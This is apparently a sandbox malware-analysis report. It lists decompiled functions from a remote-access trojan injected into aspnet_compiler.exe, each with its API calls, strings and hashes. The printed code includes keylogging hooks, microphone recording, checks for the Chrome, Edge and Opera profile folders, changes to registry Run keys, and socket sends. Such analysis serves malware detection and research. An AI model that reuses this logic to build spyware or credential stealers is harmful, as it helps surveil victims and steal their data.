                    • Opcode ID: dc57b3553d00011a6539e045a5677cc24a5fd93cd8f6676a456d400a4c8e839b
                    • Instruction ID: aa30cb8e898e471b953b87efe3deb9bdc24ff20182dd0f4763c4c7706c19c14b
                    • Opcode Fuzzy Hash: dc57b3553d00011a6539e045a5677cc24a5fd93cd8f6676a456d400a4c8e839b
                    • Instruction Fuzzy Hash: 8CF0F93070221477C7105B666C858EBBB9DCE83B65310407FF805A7381DB799E4642FD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E00419872(void* __ebx) {
                    				char _v28;
                    				void* __ebp;
                    				void* _t28;
                    				void* _t29;
                    				void* _t36;
                    				signed int _t37;
                    				void* _t39;
                    
                    				_t39 = (_t37 & 0xfffffff8) - 0x1c;
                    				E0040CEEC( &_v28, 0x30, "alarm.wav");
                    				if(PathFileExistsW(E00401EE4( &_v28)) != 0) {
                    					L7:
                    					E0041991B(E00401EE4( &_v28));
                    				} else {
                    					if(E00405AE5(0x464074) == 0) {
                    						E0041AE6B(0x4738b8, E00401EE4( &_v28));
                    						goto L7;
                    					} else {
                    						_t43 =  *0x472aca;
                    						_t28 = _t39 - 0x18;
                    						_push(0x46a8dc);
                    						if( *0x472aca == 0) {
                    							E00402073(__ebx, _t28, 0x464074, _t36);
                    							_t29 = 0x4734e8;
                    						} else {
                    							E00402073(__ebx, _t28, 0x464074, _t36);
                    							_t29 = 0x4738d0;
                    						}
                    						_push(0xa1);
                    						E00404A81(_t29, 0x464074, _t43);
                    					}
                    				}
                    				return E00401EE9();
                    			}

                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415F1F,00000000), ref: 00419897
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: alarm.wav$4G
                    • API String ID: 1174141254-2977537865
                    • Opcode ID: fcfce67ce7ff89bdba8d960ccae3216dfcaaf3815331e03428f67ddc019dfb48
                    • Instruction ID: 34e28ac8ce078d76f0f9f0665c2abcaeee574b9cd4657200da68d7dd76b5aff6
                    • Opcode Fuzzy Hash: fcfce67ce7ff89bdba8d960ccae3216dfcaaf3815331e03428f67ddc019dfb48
                    • Instruction Fuzzy Hash: 2001C020B1420056CA14FA76D8666EE26859B81358F00417FF819662E2EF7D4D85D2DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E0040A5C4(void* __ebx, struct HHOOK__** __ecx, void* __edx) {
                    				char _v28;
                    				void* __edi;
                    				void* __ebp;
                    				struct HHOOK__** _t30;
                    				void* _t31;
                    				void* _t32;
                    
                    				_t30 = __ecx;
                    				_t37 =  *((char*)(__ecx + 0x4a));
                    				if( *((char*)(__ecx + 0x4a)) == 0) {
                    					__eflags = 0;
                    					return 0;
                    				}
                    				E00402073(__ebx,  &_v28, __edx, _t31, "Online Keylogger Stopped");
                    				E0041A7B9(_t32 - 0x18,  &_v28);
                    				E0040A6DA(__ebx, _t30, _t37);
                    				E00401FB8();
                    				E00402073(__ebx, _t32,  &_v28, _t31, "Online Keylogger Stopped");
                    				E00402073(__ebx, _t32 - 0xffffffffffffffe8,  &_v28, _t31, "i");
                    				E0041A04A(__ebx, "Online Keylogger Stopped");
                    				_t30[0x12] = 0;
                    				CloseHandle(_t30[0xf]);
                    				if(_t30[0x12] == 0 &&  *_t30 != 0) {
                    					UnhookWindowsHookEx( *_t30);
                    					 *_t30 =  *_t30 & 0x00000000;
                    				}
                    				return 1;
                    			}

                    APIs
                      • Part of subcall function 0040A6DA: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                      • Part of subcall function 0040A6DA: wsprintfW.USER32 ref: 0040A769
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    • CloseHandle.KERNEL32(?), ref: 0040A627
                    • UnhookWindowsHookEx.USER32 ref: 0040A63A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                    • String ID: Online Keylogger Stopped
                    • API String ID: 1623830855-1496645233
                    • Opcode ID: 0fd4069c71e66b082cb6e77da85a8f995c278d86a89dabb762f81578838a1475
                    • Instruction ID: 152bd68872477db56328b5f984a61734b927b4b139483ca97bc76b34e3d0b4bf
                    • Opcode Fuzzy Hash: 0fd4069c71e66b082cb6e77da85a8f995c278d86a89dabb762f81578838a1475
                    • Instruction Fuzzy Hash: 7301F531A043005BD7217B65D80BBBE7B755B41305F44046FE581222D2EBBA19A6D7DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004017CC(signed int __ecx, void* __edx, void* __eflags) {
                    				void* __ebp;
                    				long _t10;
                    				signed int _t17;
                    				struct wavehdr_tag* _t25;
                    
                    				_t28 = __eflags;
                    				E00401E45(0x472d34, __edx, 0x472d34, __eflags, __ecx);
                    				E00401F7D( *0x470a80);
                    				_t17 = __ecx << 5;
                    				_t25 =  *0x472d70 + _t17;
                    				_t25->lpData = E00401F8B(E00401E45(0x472d34, __edx, 0x472d34, _t28, __ecx));
                    				_t10 =  *0x470a80; // 0x0
                    				_t25->dwBufferLength = _t10;
                    				_t25->dwBytesRecorded = 0;
                    				_t25->dwUser = 0;
                    				_t25->dwFlags = 0;
                    				_t25->dwLoops = 0;
                    				waveInPrepareHeader( *0x470ac8, _t25, 0x20);
                    				return waveInAddBuffer( *0x470ac8,  *0x472d70 + _t17, 0x20);
                    			}

                    APIs
                    • waveInPrepareHeader.WINMM(?,00000020,00000000,00000000,?,00000000,?,?,004017AE), ref: 00401829
                    • waveInAddBuffer.WINMM(?,00000020,?,00000000,?,?,004017AE), ref: 0040183F
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$BufferHeaderPrepare
                    • String ID: 4-G
                    • API String ID: 2315374483-347150978
                    • Opcode ID: d66115f22d49b23d1b184589ca0b9179fa17379b2301c72a8eda41a9a70bd51b
                    • Instruction ID: 6b7ed70fd603f0a3b73b27032148b84c73c10b4b752733d916ddca8c7a8238c5
                    • Opcode Fuzzy Hash: d66115f22d49b23d1b184589ca0b9179fa17379b2301c72a8eda41a9a70bd51b
                    • Instruction Fuzzy Hash: B201AD71302300AFC7509F35EC4492ABBA9FB89305B01413AF809C37A2EB7998508B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 29%
                    			E00447366(void* __ecx, void* __esi, void* __eflags, char _a4) {
                    				signed int _v8;
                    				signed int _t5;
                    				intOrPtr* _t18;
                    				signed int _t20;
                    
                    				_t13 = __ecx;
                    				_push(__ecx);
                    				_t5 =  *0x46f00c; // 0x54ba778e
                    				_v8 = _t5 ^ _t20;
                    				_push(__esi);
                    				_t18 = E00446D4A(0x15, "IsValidLocaleName", 0x45d1a8, "IsValidLocaleName");
                    				if(_t18 == 0) {
                    					_t3 =  &_a4; // 0x4433eb
                    					IsValidLocale(E004474BB(_t13, _t18, __eflags,  *_t3, 0), 1);
                    				} else {
                    					_t2 =  &_a4; // 0x4433eb
                    					 *0x4574c8( *_t2);
                    					 *_t18();
                    				}
                    				return E004338BB(_v8 ^ _t20);
                    			}

                    APIs
                    • IsValidLocale.KERNEL32(00000000,3D,00000000,00000001,?,?,004433EB,?,?,00442DCB,?,00000004), ref: 004473B2
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocaleValid
                    • String ID: IsValidLocaleName$3D
                    • API String ID: 1901932003-2077415542
                    • Opcode ID: dbdf72e8e2661f57c780aa44d4f8bbb8f5dee09d7a0af35499866a64bb157ce1
                    • Instruction ID: 1aafa65fd00d6e25da83e5a77131e27d47e67d355686313c1ce54cf128189aa6
                    • Opcode Fuzzy Hash: dbdf72e8e2661f57c780aa44d4f8bbb8f5dee09d7a0af35499866a64bb157ce1
                    • Instruction Fuzzy Hash: 25F0B430A84608B7E7106B219C06FAD7B54CF05712F10416AFD056A282DA795E0295ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040BA3D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				void* __ebp;
                    				int _t10;
                    				void* _t22;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t25 = __edi;
                    				_t24 = __edx;
                    				_t16 = __ebx;
                    				_t26 = __ecx;
                    				E0040415E(__ebx,  &_v28, __edx, _t27, E0043A99F(__ebx, __ecx, __eflags, L"UserProfile"));
                    				L004086C6(__ebx,  &_v28, _t25, _t27, L"\\AppData\\Local\\Google\\Chrome\\");
                    				_t10 = PathFileExistsW(E00401EE4( &_v28));
                    				_t22 = _t26;
                    				_t29 = _t10;
                    				if(_t10 == 0) {
                    					E0040415E(_t16, _t22, _t24, _t27, 0x46a8f0);
                    				} else {
                    					E00403242(_t16, _t22, _t27, _t29,  &_v28);
                    				}
                    				E00401EE9();
                    				return _t26;
                    			}

                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0040BB7D,?), ref: 0040BA70
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                    • API String ID: 1174141254-4188645398
                    • Opcode ID: df02a31d2a134d3526654c6d02b04815e03758211aaf3e703098bf13df4c2d63
                    • Instruction ID: fa1b3df0c65eba921df0d08a7c52afbe64c16d4fabbb7ff89d5955b2db38ff16
                    • Opcode Fuzzy Hash: df02a31d2a134d3526654c6d02b04815e03758211aaf3e703098bf13df4c2d63
                    • Instruction Fuzzy Hash: D0F08230A0131AA6CA14FBE6DC478FF7B6CCD10754B10007FBA01B22D2EE79994586DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040BAA0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				void* __ebp;
                    				int _t10;
                    				void* _t22;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t25 = __edi;
                    				_t24 = __edx;
                    				_t16 = __ebx;
                    				_t26 = __ecx;
                    				E0040415E(__ebx,  &_v28, __edx, _t27, E0043A99F(__ebx, __ecx, __eflags, L"UserProfile"));
                    				L004086C6(__ebx,  &_v28, _t25, _t27, L"\\AppData\\Local\\Microsoft\\Edge\\");
                    				_t10 = PathFileExistsW(E00401EE4( &_v28));
                    				_t22 = _t26;
                    				_t29 = _t10;
                    				if(_t10 == 0) {
                    					E0040415E(_t16, _t22, _t24, _t27, 0x46a8f0);
                    				} else {
                    					E00403242(_t16, _t22, _t27, _t29,  &_v28);
                    				}
                    				E00401EE9();
                    				return _t26;
                    			}

                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040BC46), ref: 0040BAD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                    • API String ID: 1174141254-2800177040
                    • Opcode ID: 43e026a29818edc11a7be37543c8696e5582a545669cfc76fe33ec9397202786
                    • Instruction ID: e51b4f52c028d78bdf66c263ab0f3750d3580a43710b0836be6e4890ee81e12e
                    • Opcode Fuzzy Hash: 43e026a29818edc11a7be37543c8696e5582a545669cfc76fe33ec9397202786
                    • Instruction Fuzzy Hash: 5CF08231A0121A96CA14F7E6DC478FF7B6CCD10718B00007FBA01B22D2EE799941C6DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040BB03(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				void* __ebp;
                    				int _t10;
                    				void* _t22;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t25 = __edi;
                    				_t24 = __edx;
                    				_t16 = __ebx;
                    				_t26 = __ecx;
                    				E0040415E(__ebx,  &_v28, __edx, _t27, E0043A99F(__ebx, __ecx, __eflags, L"AppData"));
                    				L004086C6(__ebx,  &_v28, _t25, _t27, L"\\Opera Software\\Opera Stable\\");
                    				_t10 = PathFileExistsW(E00401EE4( &_v28));
                    				_t22 = _t26;
                    				_t29 = _t10;
                    				if(_t10 == 0) {
                    					E0040415E(_t16, _t22, _t24, _t27, 0x46a8f0);
                    				} else {
                    					E00403242(_t16, _t22, _t27, _t29,  &_v28);
                    				}
                    				E00401EE9();
                    				return _t26;
                    			}











                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040BCA9), ref: 0040BB36
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: AppData$\Opera Software\Opera Stable\
                    • API String ID: 1174141254-1629609700
                    • Opcode ID: 06cae4c088094239c365531e9643b3e3e720c76cc8f8992ae3a60d6439a42d0e
                    • Instruction ID: e6a7174926e5e3b4842ccf786cfde627425bba0d2052536d9f30216573a1e43c
                    • Opcode Fuzzy Hash: 06cae4c088094239c365531e9643b3e3e720c76cc8f8992ae3a60d6439a42d0e
                    • Instruction Fuzzy Hash: 78F05E30A0021996CA14F7A2DC479FFBB6C9910718B10047FBA01B31D2EE799981C6EE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E0040ABBC(void* __ebx, void* __ecx, void* __edx) {
                    				void* _t4;
                    				void* _t7;
                    				void* _t10;
                    				signed int _t12;
                    				void* _t13;
                    				void* _t17;
                    				void* _t18;
                    				void* _t19;
                    				void* _t20;
                    
                    				_t17 = __edx;
                    				_t10 = __ebx;
                    				_t18 = __ecx;
                    				_t12 = GetKeyState(0x11) & 0x0000ffff;
                    				_t4 =  *((intOrPtr*)(_t18 + 0x4c)) - 0xa4;
                    				if(_t4 == 0) {
                    					_t13 = _t20 - 0x18;
                    					_push("[AltL]");
                    					L6:
                    					E00402073(_t10, _t13, _t17, _t19);
                    					return E00409B84(_t18);
                    				}
                    				_t7 = _t4 - 1;
                    				if(_t7 == 0) {
                    					if(_t12 == 0) {
                    						_t13 = _t20 - 0x18;
                    						_push("[AltR]");
                    						goto L6;
                    					}
                    					return _t7;
                    				} else {
                    					E004099E3(_t18, _t20 - 0x18);
                    					return E00409BA9(_t18);
                    				}
                    			}













                    APIs
                    • GetKeyState.USER32(00000011), ref: 0040ABC1
                      • Part of subcall function 004099E3: GetForegroundWindow.USER32(00000000,?,00000000), ref: 00409A17
                      • Part of subcall function 004099E3: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409A22
                      • Part of subcall function 004099E3: GetKeyboardLayout.USER32 ref: 00409A29
                      • Part of subcall function 004099E3: GetKeyState.USER32(00000010), ref: 00409A33
                      • Part of subcall function 004099E3: GetKeyboardState.USER32(?), ref: 00409A40
                      • Part of subcall function 004099E3: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409A5C
                      • Part of subcall function 00409BA9: SetEvent.KERNEL32(?,?,00000000,0040A780,00000000), ref: 00409BD5
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                    • String ID: [AltL]$[AltR]
                    • API String ID: 3195419117-2658077756
                    • Opcode ID: df627bc4a743b575a74da755f13919b46736de9882ceb998d69cc3f9b2f42ba8
                    • Instruction ID: 96eefd13142f1eb0f51443313c58276a15165e9a298fe6b1d87f9ff32337ecc9
                    • Opcode Fuzzy Hash: df627bc4a743b575a74da755f13919b46736de9882ceb998d69cc3f9b2f42ba8
                    • Instruction Fuzzy Hash: 9AE0652170431017C918323E691BA7E392197C2774B40016FF9467B6D7D8BE9D5193CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E0040AC16(void* __ebx, void* __ecx) {
                    				void* _t4;
                    				void* _t7;
                    				signed int _t9;
                    				void* _t10;
                    				void* _t12;
                    				void* _t13;
                    				void* _t14;
                    				void* _t15;
                    
                    				_t7 = __ebx;
                    				_t13 = __ecx;
                    				_t9 = GetKeyState(0x12) & 0x0000ffff;
                    				_t4 =  *((intOrPtr*)(_t13 + 0x4c)) - 0xa2;
                    				if(_t4 == 0) {
                    					if(_t9 == 0) {
                    						_t10 = _t15 - 0x18;
                    						_push("[CtrlL]");
                    						goto L5;
                    					}
                    				} else {
                    					_t4 = _t4 - 1;
                    					if(_t4 == 0) {
                    						_t10 = _t15 - 0x18;
                    						_push("[CtrlR]");
                    						L5:
                    						E00402073(_t7, _t10, _t12, _t14);
                    						return E00409B84(_t13);
                    					}
                    				}
                    				return _t4;
                    			}












                    APIs
                    • GetKeyState.USER32(00000012), ref: 0040AC1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: State
                    • String ID: [CtrlL]$[CtrlR]
                    • API String ID: 1649606143-2446555240
                    • Opcode ID: 707982bc91fbbbd2a636e6f7f8ab650285e34d35857256a952e1c03f309ecd73
                    • Instruction ID: 5068e35745fff1d0ae311e30ec864f18ca5ee1bac8daf42aff9a91bbfa6ecc8a
                    • Opcode Fuzzy Hash: 707982bc91fbbbd2a636e6f7f8ab650285e34d35857256a952e1c03f309ecd73
                    • Instruction Fuzzy Hash: E5E08621B0831017D924353F5A1E67A3910A7917A0F41027FF9426B6C6E87E8D2062CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040DCA3() {
                    				void* __esi;
                    
                    				if( *0x474a68 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                    					E00432CF1(0x474a68);
                    					_t17 =  *0x474a68 - 0xffffffff;
                    					if( *0x474a68 == 0xffffffff) {
                    						E0041074B();
                    						E0043307B(_t17, 0x456962);
                    						E00432CB2(0x474a68, 0x474a68);
                    					}
                    				}
                    				return 0x474a6c;
                    			}





                    APIs
                      • Part of subcall function 0043307B: __onexit.LIBCMT ref: 00433081
                    • __Init_thread_footer.LIBCMT ref: 0041046C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Init_thread_footer__onexit
                    • String ID: hJG$lJG
                    • API String ID: 1881088180-3986032958
                    • Opcode ID: 3098f39f6e044b7fe1c83a17937fea0626eb8e384405a203024fdf0746d1f617
                    • Instruction ID: 959a6744f9fea07c9b6c9e8e76648da5020df6129c556cb91e4ae22f1d5d63cc
                    • Opcode Fuzzy Hash: 3098f39f6e044b7fe1c83a17937fea0626eb8e384405a203024fdf0746d1f617
                    • Instruction Fuzzy Hash: 8DE0D8310415108AC110A71895829E933589B88325B61912FF904976918BAC19C1C75F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E00412D0B(void* __ecx, short* __edx, short* _a4) {
                    				void* _v8;
                    				signed int _t6;
                    
                    				_push(__ecx);
                    				if(RegOpenKeyExW(__ecx, __edx, 0, 2,  &_v8) == 0) {
                    					_t6 = RegDeleteValueW(_v8, _a4);
                    					asm("sbb al, al");
                    					return  ~_t6 + 1;
                    				}
                    				return 0;
                    			}






                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C64D,00000000,00473220,00473238,?,pth_unenc), ref: 00412D19
                    • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412D2D
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412D17
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteOpenValue
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                    • API String ID: 2654517830-1051519024
                    • Opcode ID: 73d02ef1f0cc626344373e057ae6400ba39a732c9e2669238d64bd595eb6c070
                    • Instruction ID: 31757409137fc2aa28e21d2d38410cee3dd97c0c89aa87a52c5bf8b2ac0ec4d3
                    • Opcode Fuzzy Hash: 73d02ef1f0cc626344373e057ae6400ba39a732c9e2669238d64bd595eb6c070
                    • Instruction Fuzzy Hash: D6E0C27124820CBBEF104F71EE06FFB376CEB01F01F1002A5B90592191C66ADA149664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E004167F1(void* __ebx) {
                    				void* _t1;
                    				void* _t5;
                    				void* _t10;
                    				void* _t12;
                    
                    				_t14 =  *0x470d61;
                    				if( *0x470d61 == 0) {
                    					 *0x470d61 = 1;
                    					EnumWindows(E004165EC, 0);
                    					E004020D6(__ebx, _t12 - 0x18, _t10, _t14, 0x473568);
                    					_push(0x63);
                    					E00404A81(0x4734e8, _t10, _t14);
                    					_t5 = L00405A86(__ebx, 0x473568, _t10, 0x464074);
                    					 *0x470d61 = 0;
                    					return _t5;
                    				}
                    				return _t1;
                    			}








                    APIs
                    • EnumWindows.USER32(Function_000165EC,00000000), ref: 00416809
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnumWindowssend
                    • String ID: h5G$4G
                    • API String ID: 2535772952-2693735065
                    • Opcode ID: 52884c4969bdfee6880f4c9df27e618c44e04f8f173a2268bf4e2e0b4762a65e
                    • Instruction ID: 9fe717f4edf3aaa12838891801d990c24a3a4d72d66b7b51c9a4e32ebb080fb0
                    • Opcode Fuzzy Hash: 52884c4969bdfee6880f4c9df27e618c44e04f8f173a2268bf4e2e0b4762a65e
                    • Instruction Fuzzy Hash: 3FE080207C9350B6DB31B7697D0679D39064752B54F14007EB5043A3D2C6DD5581C7DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00411D93() {
                    				int _t3;
                    				signed int _t6;
                    
                    				 *0x470d4b = 0;
                    				_t3 = TerminateProcess( *0x470d64, 0);
                    				WaitForSingleObject( *0x470d64, 0xffffffff);
                    				return _t6 & 0xffffff00 | _t3 != 0x00000000;
                    			}






                    APIs
                    • TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                    • WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ObjectProcessSingleTerminateWait
                    • String ID: pth_unenc
                    • API String ID: 1872346434-4028850238
                    • Opcode ID: ad6d013055d9b0547f0538c52e8fbec790f1cdf5f70ab7e2b39207b65bdb286b
                    • Instruction ID: e19746668ad3e5a2aa3259df84083bc395050bd976cc2345e4ea1c63972d9be6
                    • Opcode Fuzzy Hash: ad6d013055d9b0547f0538c52e8fbec790f1cdf5f70ab7e2b39207b65bdb286b
                    • Instruction Fuzzy Hash: 58D0C93414A311EBD7310BA0BC08B043B68A715362F140271F42C512F1C7659494AA59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 16%
                    			E00433B7E(intOrPtr _a4) {
                    				char _v16;
                    				char* _t11;
                    				char* _t14;
                    				void* _t17;
                    
                    				_t11 =  &_v16;
                    				E00433B3D(_t11, _a4);
                    				E004379F6( &_v16,  &E0046C448);
                    				asm("int3");
                    				_t14 = _t11;
                    				asm("lock xadd [0x46f024], eax");
                    				if(1 == 0) {
                    					_t17 = 0x470060;
                    					do {
                    						E0043444B(_t17);
                    						_t17 = _t17 + 0x18;
                    					} while (_t17 < 0x470120);
                    				}
                    				return _t14;
                    			}








                    APIs
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433B8A
                      • Part of subcall function 00433B3D: std::exception::exception.LIBCONCRT ref: 00433B4A
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00433B98
                      • Part of subcall function 004379F6: RaiseException.KERNEL32(?,?,00433B7D,?,?,?,00000000,?,?,?,P@,00433B7D,?,0046C40C,00000000), ref: 00437A55
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                    • String ID: P@
                    • API String ID: 1586462112-676759640
                    • Opcode ID: be34dfb19e6d27ab7c593c9c32c23ad28ddfa9a66cdc613b31972520aea6299d
                    • Instruction ID: fee150121e0675781914aead59bbd43a186a04d22f31c7314f5b286c5f6f48c1
                    • Opcode Fuzzy Hash: be34dfb19e6d27ab7c593c9c32c23ad28ddfa9a66cdc613b31972520aea6299d
                    • Instruction Fuzzy Hash: D0C08CB4C0030CB7CB00FBE5C856E9DB73C9F08304F50852ABA5092082EB78A30987DA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0044DB8A() {
                    
                    				 *0x470a50 = GetCommandLineA();
                    				 *0x470a54 = GetCommandLineW();
                    				return 1;
                    			}




                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CommandLine
                    • String ID: X4
                    • API String ID: 3253501508-3309041210
                    • Opcode ID: eacc33f57547a3f8ec88c580fc28d683a1ab5a9404e9f1bc00239eb361e61a9c
                    • Instruction ID: 68c496257c7160e71493908100abf0d3b6607c74e499a62d46a4e25d18f99d2b
                    • Opcode Fuzzy Hash: eacc33f57547a3f8ec88c580fc28d683a1ab5a9404e9f1bc00239eb361e61a9c
                    • Instruction Fuzzy Hash: BFB00278806780CFC7409F74B91C5443BA0B668607B9465B5D81ED2B21E779C045DF28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0043F561(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
                    				char* _v8;
                    				int _v12;
                    				char _v16;
                    				char _v24;
                    				char _v28;
                    				void* __ebx;
                    				char _t34;
                    				int _t35;
                    				int _t38;
                    				long _t39;
                    				char* _t42;
                    				int _t44;
                    				int _t47;
                    				int _t53;
                    				intOrPtr _t55;
                    				void* _t56;
                    				char* _t57;
                    				char* _t62;
                    				char* _t63;
                    				void* _t64;
                    				int _t65;
                    				short* _t67;
                    				short* _t68;
                    				int _t69;
                    				intOrPtr* _t70;
                    
                    				_t64 = __edx;
                    				_t53 = _a12;
